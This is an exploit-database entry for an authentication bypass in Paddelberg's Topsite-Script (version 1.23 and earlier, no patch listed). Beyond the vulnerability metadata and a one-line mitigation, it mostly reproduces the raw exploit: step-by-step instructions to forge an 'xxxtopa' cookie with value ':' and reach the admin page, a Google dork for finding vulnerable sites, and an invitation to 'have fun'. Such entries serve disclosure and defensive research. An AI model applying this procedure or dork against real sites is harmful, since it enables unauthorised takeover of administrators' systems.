Paddelberg's topsite-script admin auth bypass

vendor:

Topsite-Script

by:

Christian Inci

7,5

CVSS

HIGH

Authentication Bypass

287 (Authentication Bypass)

CWE

Product Name: Topsite-Script

Affected Version From: <= 1.23

Affected Version To: <= 1.23

Patch Exists: NO

Related CWE: None

CPE: paddelberg:topsite-script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: 1.23

2012

Paddelberg’s topsite-script admin auth bypass

This exploit allows an attacker to bypass the authentication of the Paddelberg's topsite-script admin page. The attacker can create a cookie with the host name, path name, cookie name set to 'xxxtopa' and cookie value set to ':'. Then, the attacker can visit the admin page and gain access to the page without authentication.

Mitigation:

Ensure that authentication is properly implemented and enforced.

Source

Exploit-DB raw data:

# Exploit Title: Paddelberg's topsite-script admin auth bypass.
# Google Dork: intext:"powered by php scripte webmaster resource"
# Date: 8. 1. 2012
# Author: Christian Inci
# Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/
# Version: <= 1.23 (22. 9. 2007)
# Tested on: 1.23
# Vendor response: None, as I didn't contacted them.

PoC/Exploit:
1.: Open a random cookie editor.
2.: Create a cookie, as usually:
  2.1: Set the host name.
  2.2: Set the path name. (e.g.: "[script-base-path]/admin/")
  2.3: Set the cookie name to "xxxtopa".
  2.4: Set the cookie value to ":".
  2.5: Save it.
3.: Visit the following URL: "[script-base-url]/admin/". (This won't work if the directory is "protected" with a .htaccess file.)
4.: Do whatever you like to do here. (Have fun!)